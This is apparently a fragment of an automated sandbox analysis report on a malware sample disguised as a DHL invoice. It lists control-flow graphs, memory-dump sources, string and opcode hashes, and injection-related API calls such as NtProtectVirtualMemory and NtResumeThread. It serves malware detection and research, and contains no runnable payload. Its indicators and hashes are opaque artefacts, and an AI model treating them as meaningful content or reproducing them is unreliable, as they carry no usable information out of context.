                                                                                                                control_flow_graph 1558 523b448-523b469 1559 523b470-523b553 call 523bfa8 1558->1559 1560 523b46b 1558->1560 1568 523b562 1559->1568 1569 523b555-523b560 1559->1569 1560->1559 1570 523b56c-523b687 1568->1570 1569->1570 1581 523b699-523b6c4 1570->1581 1582 523b689-523b68f 1570->1582 1583 523be8a-523bea6 1581->1583 1582->1581 1584 523b6c9-523b814 call 5239f28 call 523d898 1583->1584 1585 523beac-523bec7 1583->1585 1595 523b81a-523b82c 1584->1595 1596 523b83e-523b9cd call 5237378 call 52371b8 1595->1596 1597 523b82e-523b834 1595->1597 1609 523ba32-523ba3c 1596->1609 1610 523b9cf-523b9d3 1596->1610 1597->1596 1613 523bc63-523bc82 1609->1613 1611 523b9d5-523b9d6 1610->1611 1612 523b9db-523ba2d 1610->1612 1614 523bd08-523bd73 1611->1614 1612->1614 1615 523ba41-523bb87 call 5239f28 1613->1615 1616 523bc88-523bcb2 1613->1616 1633 523bd85-523bdd0 1614->1633 1634 523bd75-523bd7b 1614->1634 1645 523bb8d-523bc59 call 5239f28 1615->1645 1646 523bc5c-523bc5d 1615->1646 1622 523bd05-523bd06 1616->1622 1623 523bcb4-523bd02 1616->1623 1622->1614 1623->1622 1636 523bdd6-523be6e 1633->1636 1637 523be6f-523be87 1633->1637 1634->1633 1636->1637 1637->1583 1645->1646 1646->1613
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2049494655.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5230000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: fcq$8
                                                                                                                • API String ID: 0-89531850
                                                                                                                • Opcode ID: aa673396a6b4836b572c01732f920ca47d1523e55f2a3f5442136fe4cbf09936
                                                                                                                • Instruction ID: 537975ed590b42ed58b7bdf8b2a512b7d1e90e0e1d89f85907cb71cd53fe133a
                                                                                                                • Opcode Fuzzy Hash: aa673396a6b4836b572c01732f920ca47d1523e55f2a3f5442136fe4cbf09936
                                                                                                                • Instruction Fuzzy Hash: 1652E475E00229CFDB64DF68C895AD9B7B2BF89300F5086AAD50DA7355DB30AE81CF50
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2036075757.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a50000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 4'^q$4'^q
                                                                                                                • API String ID: 0-2697143702
                                                                                                                • Opcode ID: c294b685ce85980a10746eab97a6778793dd2373ef65cbd5c4330584672f8382
                                                                                                                • Instruction ID: 01a83cd469c0474ceec4f20c1ec9b02291e5920cd0af58578e4e0c4b94c0a9e1
                                                                                                                • Opcode Fuzzy Hash: c294b685ce85980a10746eab97a6778793dd2373ef65cbd5c4330584672f8382
                                                                                                                • Instruction Fuzzy Hash: 74711C71E042048FE708EF7AE885699BBF6BFC5304F18C529D4099B379EB30590ADB41
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2049494655.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5230000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: fcq$h
                                                                                                                • API String ID: 0-1849521214
                                                                                                                • Opcode ID: acd524337fe8234cb56f4e215bf4e9af1dfe44899aefac6c2462857fdcad7b77
                                                                                                                • Instruction ID: 779ca6bda908ff20ddcf9d6134ed7ad745dfe166d9b3929af3e99fa53005a9f0
                                                                                                                • Opcode Fuzzy Hash: acd524337fe8234cb56f4e215bf4e9af1dfe44899aefac6c2462857fdcad7b77
                                                                                                                • Instruction Fuzzy Hash: A0710471E00629CBDB24DF69C895BDAB7B2FF89300F40C2AAD51DA7294DB305A85CF50
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2036075757.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a50000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 4'^q$4'^q
                                                                                                                • API String ID: 0-2697143702
                                                                                                                • Opcode ID: 696de9c4240023f0ced4a332155bb10720a8cf990fd2a7655d3908c070f99630
                                                                                                                • Instruction ID: 24ca621a3c7201a469311af8d8cc359d1dc0eac59a13eaa77b1fe9da948370e0
                                                                                                                • Opcode Fuzzy Hash: 696de9c4240023f0ced4a332155bb10720a8cf990fd2a7655d3908c070f99630
                                                                                                                • Instruction Fuzzy Hash: 94710D70A042048FE708EF7AE984699BBF6BFC5304F18C529D4099B379EB70594ADB41
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Te^q
                                                                                                                • API String ID: 0-671973202
                                                                                                                • Opcode ID: cb68be121ed1a4451932d2f4670bc4a7b147a43de593030338f43518c905c816
                                                                                                                • Instruction ID: 79e9f240c95f86437fbcf63608dc4af48bf81191e61bf713aed5f14af50bddeb
                                                                                                                • Opcode Fuzzy Hash: cb68be121ed1a4451932d2f4670bc4a7b147a43de593030338f43518c905c816
                                                                                                                • Instruction Fuzzy Hash: CC02E370A04228CFDB64DF69C889BAEB7F2FB49300F1085AAD509A7765DB705E84CF50
                                                                                                                APIs
                                                                                                                • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 0523ED99
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2049494655.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5230000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MemoryProtectVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 2706961497-0
                                                                                                                • Opcode ID: 50e4a955cf3cf9ce973dcda3a24baadf58d18788579d4a62ec75ad8647bf334b
                                                                                                                • Instruction ID: 45eaf8ff2649d7b1fc073d461072c51bf33d593d5ad2327666acbdc613bae1fb
                                                                                                                • Opcode Fuzzy Hash: 50e4a955cf3cf9ce973dcda3a24baadf58d18788579d4a62ec75ad8647bf334b
                                                                                                                • Instruction Fuzzy Hash: 862120B1D003499FCB10CFAAD984ADEFBF5FF48310F20842AE419A7210C735A944CBA4
                                                                                                                APIs
                                                                                                                • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 0523ED99
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2049494655.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5230000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MemoryProtectVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 2706961497-0
                                                                                                                • Opcode ID: 9cd35edeb5408e8103b37fa53c0e4e011b6641d0e8b89cf618318de30b067c7f
                                                                                                                • Instruction ID: 784c8574d72f2345c8884444beb3663d7c8ed8dc0297ff1e59a238af157e8e4c
                                                                                                                • Opcode Fuzzy Hash: 9cd35edeb5408e8103b37fa53c0e4e011b6641d0e8b89cf618318de30b067c7f
                                                                                                                • Instruction Fuzzy Hash: 9921E0B1D013499FCB10DFAAD984ADEFBF9FF48310F20842AE519A7250C775A944CBA5
                                                                                                                APIs
                                                                                                                • NtResumeThread.NTDLL(?,?), ref: 052E13DE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2049662868.00000000052E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05290000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2049582466.0000000005290000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5290000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ResumeThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 947044025-0
                                                                                                                • Opcode ID: 49da5a2f44914b93fec9e1a5b818d49407842c9987fcc8c963a1a17b8b4ddfc2
                                                                                                                • Instruction ID: b13d86728166e416cda6471cbbc4821c538c7f2c816284f33d9469c2a7e495d3
                                                                                                                • Opcode Fuzzy Hash: 49da5a2f44914b93fec9e1a5b818d49407842c9987fcc8c963a1a17b8b4ddfc2
                                                                                                                • Instruction Fuzzy Hash: 2D11E4B1D003498FDB14DFAAC484ADEFBF4EF88324F50842AD459A7250CB78A944CFA5
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Te^q
                                                                                                                • API String ID: 0-671973202
                                                                                                                • Opcode ID: f293e548dfdeb0855121dfa90a7d4de7120f63f8bcce5677246d7da793456bdf
                                                                                                                • Instruction ID: 6184fd7cf025a481336fe9295d191bd85548d1335989e1329c87bf0d9889bfec
                                                                                                                • Opcode Fuzzy Hash: f293e548dfdeb0855121dfa90a7d4de7120f63f8bcce5677246d7da793456bdf
                                                                                                                • Instruction Fuzzy Hash: 3BB11474E04228CFEB24DFAAD884BADBBF6BF89300F1494A9D419A7255DB705985CF40
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Te^q
                                                                                                                • API String ID: 0-671973202
                                                                                                                • Opcode ID: dd619df8b9880049516f20a3fb9d7eea5d8785b19d58c2967b1b4861a50ceffb
                                                                                                                • Instruction ID: 24befd5479ecf44c861f587c51aa611f4ff6f121aa4a6baba52e73d4e53831db
                                                                                                                • Opcode Fuzzy Hash: dd619df8b9880049516f20a3fb9d7eea5d8785b19d58c2967b1b4861a50ceffb
                                                                                                                • Instruction Fuzzy Hash: 43B11774E04228CFDB24DFAAD884BADBBF2BF49300F1494A9D419A7355DB705A85CF41
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050306783.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c10000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Te^q
                                                                                                                • API String ID: 0-671973202
                                                                                                                • Opcode ID: 4a90306460f40c414478d0fae0ce6fe2adcd23b6f082e234abcd4557c6d3259a
                                                                                                                • Instruction ID: 4f4881e86ed4a3743d528e7f0b605c94d3f1412121e28b09cd829906c119685c
                                                                                                                • Opcode Fuzzy Hash: 4a90306460f40c414478d0fae0ce6fe2adcd23b6f082e234abcd4557c6d3259a
                                                                                                                • Instruction Fuzzy Hash: A3A1E774E04218CFDB14DFAAD884BADBBF2FF8A304F208469D809A7255DB749946DF04
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050306783.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c10000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Te^q
                                                                                                                • API String ID: 0-671973202
                                                                                                                • Opcode ID: ba070c22dc3db5ced4b78ef469decdc60dcb63bb0b83d118ab3aba58443cc369
                                                                                                                • Instruction ID: b5bb463c8c5c232465a9975f2bb9d68dfdfa4959304885fbfc1a5d8c5e2004e3
                                                                                                                • Opcode Fuzzy Hash: ba070c22dc3db5ced4b78ef469decdc60dcb63bb0b83d118ab3aba58443cc369
                                                                                                                • Instruction Fuzzy Hash: 55A1E674E04218CFDB14DFA9D884BADBBF2FF8A300F248469E809A7265DB749945DF04
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2049761516.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5390000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 6288fc8b9ee086c5948c58029382f97ea3fc32647770737e1953c810f510e9a5
                                                                                                                • Instruction ID: 74dca8829df21ebe9f5131e035b46697d30b99a65133b6927db74a2d424f7a28
                                                                                                                • Opcode Fuzzy Hash: 6288fc8b9ee086c5948c58029382f97ea3fc32647770737e1953c810f510e9a5
                                                                                                                • Instruction Fuzzy Hash: 4452B4B4A04228CFCB64DF28C984B9ABBB6FB89301F1085D9D50DA7355DB30AE85CF51
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050844810.0000000005F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F70000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5f70000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 67eed09a96a9d87f629d51cc54632721b4b17f496c6fa1a1311a17b613b6740e
                                                                                                                • Instruction ID: 64aaa31bcd82321485005cb7a1ae2a7fbbc84d945021a79b7ee0c51818784230
                                                                                                                • Opcode Fuzzy Hash: 67eed09a96a9d87f629d51cc54632721b4b17f496c6fa1a1311a17b613b6740e
                                                                                                                • Instruction Fuzzy Hash: 1C02F371A05218CFDB64EF68D884BAEBBF6FB49300F5081AAD409A7395DB345E85CF11
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050844810.0000000005F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F70000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5f70000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 198d4d82d370c2588d86a1a16142972a076b16b47e8e017d0e8b5fa271a41840
                                                                                                                • Instruction ID: 23cb0b7b8de157a5aa8d14331ad88404845309431e8789a58c90a87b0f2dca5b
                                                                                                                • Opcode Fuzzy Hash: 198d4d82d370c2588d86a1a16142972a076b16b47e8e017d0e8b5fa271a41840
                                                                                                                • Instruction Fuzzy Hash: 63E10370E0521CCFDB14DFA5D984BADBBF6BF89304F5080AAD00AAB295CB785985CF15
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050844810.0000000005F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F70000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5f70000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a5d6239d1d0b197bbe90ad8cad4cc62e672a26095ef7234fc39874f4f9d3469b
                                                                                                                • Instruction ID: dac2cc261deeebbeb37545b28a5df439b144db29d06efe9611698a36b7382124
                                                                                                                • Opcode Fuzzy Hash: a5d6239d1d0b197bbe90ad8cad4cc62e672a26095ef7234fc39874f4f9d3469b
                                                                                                                • Instruction Fuzzy Hash: 0BC1E575E04218CFEB54DFA9D884BADBBF6FB89300F5080AAD409AB295CB345D85CF11
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2049494655.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5230000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d149a4020a8d3fb44ef0c072e95a3fd3fef8d06e6fea2b8fe2a2b4ed63d2e819
                                                                                                                • Instruction ID: 3491e1b9749deee7fb41de2771b76fee06bdd249fc33ac67d6383d46ad247c65
                                                                                                                • Opcode Fuzzy Hash: d149a4020a8d3fb44ef0c072e95a3fd3fef8d06e6fea2b8fe2a2b4ed63d2e819
                                                                                                                • Instruction Fuzzy Hash: 7E810AB0E04209DFDB04DFA9D495AAEBBF6FF89300F158069E409AB364DB70A945CF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2049494655.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5230000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: a556b5c51ab7b761bc38c78c326be54dab3b264cfe1d6e72920f2595b7d5423b
                                                                                                                • Instruction ID: 6f5e838520fc389515c24a4fa67eca9da7450656edf4f678eb7fe1e04ee09546
                                                                                                                • Opcode Fuzzy Hash: a556b5c51ab7b761bc38c78c326be54dab3b264cfe1d6e72920f2595b7d5423b
                                                                                                                • Instruction Fuzzy Hash: 59710AB0E04209DFDB04DFA9D485AAEBBFAFF88300F158069E419AB354DB70A945CF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050914473.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_6230000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 05e2006c42429a7e92426b2c4ecfddbd8a94e958c4a73303cc967b739a90adfa
                                                                                                                • Instruction ID: ed0c8995b0f4c58afff9045c9b2ce074f5c69e8bae4aef8bc0cc513ec2196713
                                                                                                                • Opcode Fuzzy Hash: 05e2006c42429a7e92426b2c4ecfddbd8a94e958c4a73303cc967b739a90adfa
                                                                                                                • Instruction Fuzzy Hash: 6F612A74A14218CFEB98DF68D894BADB7F1BF49304F0580AAD859A7360DB746E85CF01
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050844810.0000000005F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F70000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5f70000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 30528d4d8178a4c5b2720cdd80d4aa381742d9a7bcca346c4076cd4f25b8f50b
                                                                                                                • Instruction ID: 77562d11d209df966d038d5f603af7f9d2135605784396dd0b9025ea8e480646
                                                                                                                • Opcode Fuzzy Hash: 30528d4d8178a4c5b2720cdd80d4aa381742d9a7bcca346c4076cd4f25b8f50b
                                                                                                                • Instruction Fuzzy Hash: A841E2B1D0521CCBDB04CF9AD844BEDBBF6BB8A310F14D1AAD419AB214EB785945CF50

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 803 5c2a790-5c2a7b8 805 5c2a806-5c2a814 803->805 806 5c2a7ba-5c2a801 803->806 807 5c2a823 805->807 808 5c2a816-5c2a821 call 5c282b0 805->808 854 5c2ac5d-5c2ac64 806->854 811 5c2a825-5c2a82c 807->811 808->811 813 5c2a832-5c2a836 811->813 814 5c2a915-5c2a919 811->814 818 5c2ac65-5c2ac8d 813->818 819 5c2a83c-5c2a840 813->819 815 5c2a91b-5c2a92a call 5c264c8 814->815 816 5c2a96f-5c2a979 814->816 833 5c2a92e-5c2a933 815->833 820 5c2a9b2-5c2a9d8 816->820 821 5c2a97b-5c2a98a call 5c25c78 816->821 825 5c2ac94-5c2acbe 818->825 823 5c2a852-5c2a8b0 call 5c27ff0 call 5c28a58 819->823 824 5c2a842-5c2a84c 819->824 851 5c2a9e5 820->851 852 5c2a9da-5c2a9e3 820->852 836 5c2a990-5c2a9ad 821->836 837 5c2acc6-5c2acdc 821->837 865 5c2ad23-5c2ad4d 823->865 866 5c2a8b6-5c2a910 823->866 824->823 824->825 825->837 838 5c2a935-5c2a96a call 5c2a258 833->838 839 5c2a92c 833->839 836->854 863 5c2ace4-5c2ad1c 837->863 838->854 839->833 853 5c2a9e7-5c2aa0f 851->853 852->853 869 5c2aae0-5c2aae4 853->869 870 5c2aa15-5c2aa2e 853->870 863->865 875 5c2ad57-5c2ad5d 865->875 876 5c2ad4f-5c2ad55 865->876 866->854 873 5c2aae6-5c2aaff 869->873 874 5c2ab5e-5c2ab68 869->874 870->869 896 5c2aa34-5c2aa43 call 5c256a0 870->896 873->874 901 5c2ab01-5c2ab10 call 5c256a0 873->901 878 5c2abc5-5c2abce 874->878 879 5c2ab6a-5c2ab74 874->879 876->875 882 5c2ad5e-5c2ad9b 876->882 884 5c2abd0-5c2abfe call 5c27800 call 5c27820 878->884 885 5c2ac06-5c2ac53 878->885 894 5c2ab76-5c2ab78 879->894 895 5c2ab7a-5c2ab8c 879->895 884->885 907 5c2ac5b 885->907 902 5c2ab8e-5c2ab90 894->902 895->902 917 5c2aa45-5c2aa4b 896->917 918 5c2aa5b-5c2aa70 896->918 924 5c2ab12-5c2ab18 901->924 925 5c2ab28-5c2ab33 901->925 905 5c2ab92-5c2ab96 902->905 906 5c2abbe-5c2abc3 902->906 913 5c2abb4-5c2abb9 call 5c244a0 905->913 914 5c2ab98-5c2abb1 905->914 906->878 906->879 907->854 913->906 914->913 926 5c2aa4f-5c2aa51 917->926 927 5c2aa4d 917->927 921 5c2aa72-5c2aa9e call 5c26950 918->921 922 5c2aaa4-5c2aaad 918->922 921->863 921->922 922->865 932 5c2aab3-5c2aada 922->932 933 5c2ab1a 924->933 934 5c2ab1c-5c2ab1e 924->934 925->865 928 5c2ab39-5c2ab5c 925->928 926->918 927->918 928->874 928->901 932->869 932->896 933->925 934->925
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Hbq$Hbq$Hbq
                                                                                                                • API String ID: 0-2297679979
                                                                                                                • Opcode ID: cc2ce5bac123f8827582d3fc5cb85a4e46a883f1e97d0b31ccda7bd4a8842ca9
                                                                                                                • Instruction ID: ca20aa1844c04fb5e2f8d3464543dfe7162ea52cb264e018f5007795c08267ec
                                                                                                                • Opcode Fuzzy Hash: cc2ce5bac123f8827582d3fc5cb85a4e46a883f1e97d0b31ccda7bd4a8842ca9
                                                                                                                • Instruction Fuzzy Hash: B8124C35A002149FCB24DFA5C984A6EBBF6FF88300F148969E50A9B351DB75ED46CF50

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 945 5c2c448-5c2c485 947 5c2c4a7-5c2c4bd call 5c2c250 945->947 948 5c2c487-5c2c48c call 5c2cdb8 945->948 954 5c2c833-5c2c847 947->954 955 5c2c4c3-5c2c4cf 947->955 951 5c2c492-5c2c494 948->951 951->947 952 5c2c496-5c2c49e 951->952 952->947 965 5c2c887-5c2c890 954->965 956 5c2c600-5c2c607 955->956 957 5c2c4d5-5c2c4d8 955->957 960 5c2c736-5c2c773 call 5c2bc58 call 5c2ebf0 956->960 961 5c2c60d-5c2c616 956->961 958 5c2c4db-5c2c4e4 957->958 963 5c2c4ea-5c2c4fe 958->963 964 5c2c928 958->964 1005 5c2c779-5c2c82a call 5c2bc58 960->1005 961->960 966 5c2c61c-5c2c728 call 5c2bc58 call 5c2c1e8 call 5c2bc58 961->966 982 5c2c5f0-5c2c5fa 963->982 983 5c2c504-5c2c599 call 5c2c250 * 2 call 5c2bc58 call 5c2c1e8 call 5c2c290 call 5c2c338 call 5c2c3a0 963->983 973 5c2c92d-5c2c931 964->973 967 5c2c892-5c2c899 965->967 968 5c2c855-5c2c85e 965->968 1056 5c2c733 966->1056 1057 5c2c72a 966->1057 971 5c2c8e7-5c2c8ee 967->971 972 5c2c89b-5c2c8de call 5c2bc58 967->972 968->964 975 5c2c864-5c2c876 968->975 976 5c2c913-5c2c926 971->976 977 5c2c8f0-5c2c900 971->977 972->971 980 5c2c933 973->980 981 5c2c93c 973->981 992 5c2c886 975->992 993 5c2c878-5c2c87d 975->993 976->973 977->976 994 5c2c902-5c2c90a 977->994 980->981 990 5c2c93d 981->990 982->956 982->958 1035 5c2c59b-5c2c5b3 call 5c2c338 call 5c2bc58 call 5c2bf08 983->1035 1036 5c2c5b8-5c2c5eb call 5c2c3a0 983->1036 990->990 992->965 1058 5c2c880 call 5c2f390 993->1058 1059 5c2c880 call 5c2f381 993->1059 994->976 1005->954 1035->1036 1036->982 1056->960 1057->1056 1058->992 1059->992
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 4'^q$4'^q$4'^q
                                                                                                                • API String ID: 0-1196845430
                                                                                                                • Opcode ID: 6fe6b7d869753c86910aa9ec0d02a66a6a3da8f381d41e7d0ca0f00c757a9073
                                                                                                                • Instruction ID: 09da244e2f50299324335085a8f8729fb77131d7b164dc372ac5c575560bdde1
                                                                                                                • Opcode Fuzzy Hash: 6fe6b7d869753c86910aa9ec0d02a66a6a3da8f381d41e7d0ca0f00c757a9073
                                                                                                                • Instruction Fuzzy Hash: 7EF1C834A10218DFCB18DFA4D998AADBBB2FF88300F158559E406AB365DF71ED42CB51
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2049813348.00000000053C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053C0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_53c0000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 4'^q$4'^q
                                                                                                                • API String ID: 0-2697143702
                                                                                                                • Opcode ID: 9bc4d385143d810c7d83e74826d3fd862a825e4dd428aa281d37d5d61f955acb
                                                                                                                • Instruction ID: 9e5a5d7995b2af3795b56b0331a73a01fc393b2c06c874fc402e2f95df6bffbb
                                                                                                                • Opcode Fuzzy Hash: 9bc4d385143d810c7d83e74826d3fd862a825e4dd428aa281d37d5d61f955acb
                                                                                                                • Instruction Fuzzy Hash: 0642C538E04209CFDB24DF98D598ABEBFB6BB49300F108099E95267354CB74AD86DF51

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
